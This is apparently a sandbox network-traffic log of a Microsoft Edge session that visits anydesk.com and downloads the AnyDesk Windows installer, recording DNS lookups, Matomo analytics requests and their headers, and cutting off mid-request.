cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64
cookie: __hssc=261462610.3.1728144483689
DNS

51.248.66.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

51.248.66.18.in-addr.arpa

IN PTR

Response

51.248.66.18.in-addr.arpa

IN PTR

server-18-66-248-51dus51r cloudfrontnet
DNS

51.248.66.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

51.248.66.18.in-addr.arpa

IN PTR

Response

51.248.66.18.in-addr.arpa

IN PTR

server-18-66-248-51dus51r cloudfrontnet
DNS

anydesk.com

msedge.exe

Remote address:

8.8.8.8:53

Request

anydesk.com

IN A

Response

anydesk.com

IN A

18.66.248.79

anydesk.com

IN A

18.66.248.25

anydesk.com

IN A

18.66.248.51

anydesk.com

IN A

18.66.248.74
DNS

anydesk.com

msedge.exe

Remote address:

8.8.8.8:53

Request

anydesk.com

IN A

Response

anydesk.com

IN A

18.66.248.51

anydesk.com

IN A

18.66.248.74

anydesk.com

IN A

18.66.248.79

anydesk.com

IN A

18.66.248.25
DNS

ad-wa.anydesk.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ad-wa.anydesk.com

IN A

Response

ad-wa.anydesk.com

IN A

167.235.224.171
DNS

ad-wa.anydesk.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ad-wa.anydesk.com

IN A

Response

ad-wa.anydesk.com

IN A

167.235.224.171
DNS

js.hs-scripts.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.hs-scripts.com

IN A

Response

js.hs-scripts.com

IN A

104.16.139.209

js.hs-scripts.com

IN A

104.16.138.209

js.hs-scripts.com

IN A

104.16.137.209

js.hs-scripts.com

IN A

104.16.140.209

js.hs-scripts.com

IN A

104.16.141.209
DNS

js.hs-scripts.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.hs-scripts.com

IN A

Response

js.hs-scripts.com

IN A

104.16.139.209

js.hs-scripts.com

IN A

104.16.137.209

js.hs-scripts.com

IN A

104.16.141.209

js.hs-scripts.com

IN A

104.16.140.209

js.hs-scripts.com

IN A

104.16.138.209
DNS

www.recaptcha.net

msedge.exe

Remote address:

8.8.8.8:53

Request

www.recaptcha.net

IN A

Response

www.recaptcha.net

IN A

172.217.169.67
DNS

www.recaptcha.net

msedge.exe

Remote address:

8.8.8.8:53

Request

www.recaptcha.net

IN A

Response

www.recaptcha.net

IN A

172.217.169.67
GET

https://ad-wa.anydesk.com/matomo.js

msedge.exe

Remote address:

167.235.224.171:443

Request

GET /matomo.js HTTP/2.0
host: ad-wa.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:07:48 GMT
content-type: application/javascript
content-length: 148434
last-modified: Tue, 16 Jan 2024 12:45:21 GMT
etag: "65a67a61-243d2"
expires: Sat, 05 Oct 2024 17:07:48 GMT
cache-control: max-age=3600
pragma: public
cache-control: public
accept-ranges: bytes
strict-transport-security: max-age=31536000; includeSubDomains
GET

https://ad-wa.anydesk.com/js/container_jWh5YR4y.js

msedge.exe

Remote address:

167.235.224.171:443

Request

GET /js/container_jWh5YR4y.js HTTP/2.0
host: ad-wa.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:07:48 GMT
content-type: application/javascript
content-length: 78339
last-modified: Thu, 25 Jan 2024 07:10:22 GMT
etag: "65b2095e-13203"
expires: Sat, 05 Oct 2024 17:07:48 GMT
cache-control: max-age=3600
pragma: public
cache-control: public
accept-ranges: bytes
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?action_name=The%20Fast%20Remote%20Desktop%20Application%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=310497&h=16&m=7&s=47&url=https%3A%2F%2Fanydesk.com%2Fen&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=&_idn=1&send_image=0&_refts=1728144468&_ref=https%3A%2F%2Fwww.bing.com%2F&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=IWpxdS&pf_net=0&pf_srv=860&pf_tfr=1&pf_dm1=956&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?action_name=The%20Fast%20Remote%20Desktop%20Application%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=310497&h=16&m=7&s=47&url=https%3A%2F%2Fanydesk.com%2Fen&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=&_idn=1&send_image=0&_refts=1728144468&_ref=https%3A%2F%2Fwww.bing.com%2F&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=IWpxdS&pf_net=0&pf_srv=860&pf_tfr=1&pf_dm1=956&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:07:48 GMT
content-type: application/javascript
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
GET

https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=79xhw7&url=https%3A%2F%2Fanydesk.com%2Fen

msedge.exe

Remote address:

167.235.224.171:443

Request

GET /plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=79xhw7&url=https%3A%2F%2Fanydesk.com%2Fen HTTP/2.0
host: ad-wa.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:07:48 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?e_c=CTA&e_a=Download&e_n=home&ca=1&idsite=3&rec=1&r=485076&h=16&m=7&s=51&url=https%3A%2F%2Fanydesk.com%2Fen&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=&_idn=1&send_image=0&_refts=1728144471&_ref=https%3A%2F%2Fwww.bing.com%2F&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=IWpxdS&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?e_c=CTA&e_a=Download&e_n=home&ca=1&idsite=3&rec=1&r=485076&h=16&m=7&s=51&url=https%3A%2F%2Fanydesk.com%2Fen&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=&_idn=1&send_image=0&_refts=1728144471&_ref=https%3A%2F%2Fwww.bing.com%2F&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=IWpxdS&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:07:52 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
GET

https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=JWEclr&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe

msedge.exe

Remote address:

167.235.224.171:443

Request

GET /plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=JWEclr&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe HTTP/2.0
host: ad-wa.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true

Response

HTTP/2.0 200

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:04 GMT
content-type: application/javascript
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?action_name=Thank%20you%20for%20downloading%20AnyDesk&idsite=3&rec=1&r=911489&h=16&m=7&s=54&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=bUEm12&pf_net=0&pf_srv=1619&pf_tfr=1&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?action_name=Thank%20you%20for%20downloading%20AnyDesk&idsite=3&rec=1&r=911489&h=16&m=7&s=54&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=bUEm12&pf_net=0&pf_srv=1619&pf_tfr=1&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:05 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?e_c=Downloads&e_a=Download%20-%20Windows&e_n=8.1.0&ca=1&idsite=3&rec=1&r=462112&h=16&m=7&s=55&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=bUEm12&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?e_c=Downloads&e_a=Download%20-%20Windows&e_n=8.1.0&ca=1&idsite=3&rec=1&r=462112&h=16&m=7&s=55&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=bUEm12&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:05 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?download=https%3A%2F%2Fdownload.anydesk.com%2FAnyDesk.exe&idsite=3&rec=1&r=843874&h=16&m=7&s=55&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=bUEm12&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?download=https%3A%2F%2Fdownload.anydesk.com%2FAnyDesk.exe&idsite=3&rec=1&r=843874&h=16&m=7&s=55&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=bUEm12&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:05 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?action_name=Remote%20Desktop%20Software%20for%20Windows%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=303818&h=16&m=8&s=6&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=mOtKQg&pf_net=0&pf_srv=1621&pf_tfr=2&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?action_name=Remote%20Desktop%20Software%20for%20Windows%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=303818&h=16&m=8&s=6&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=mOtKQg&pf_net=0&pf_srv=1621&pf_tfr=2&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:06 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
GET

https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=utgTKR&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

msedge.exe

Remote address:

167.235.224.171:443

Request

GET /plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=utgTKR&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows HTTP/2.0
host: ad-wa.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689

Response

HTTP/2.0 200

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:08 GMT
content-type: application/javascript
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?e_c=Downloads&e_a=Download%20-%20&e_n=&ca=1&idsite=3&rec=1&r=386148&h=16&m=8&s=6&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=mOtKQg&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?e_c=Downloads&e_a=Download%20-%20&e_n=&ca=1&idsite=3&rec=1&r=386148&h=16&m=8&s=6&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=mOtKQg&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:13 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?action_name=Remote%20Desktop%20Software%20for%20Windows%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=540590&h=16&m=8&s=14&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=DmXfPN&pf_net=0&pf_srv=7&pf_tfr=3&pf_dm1=138&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

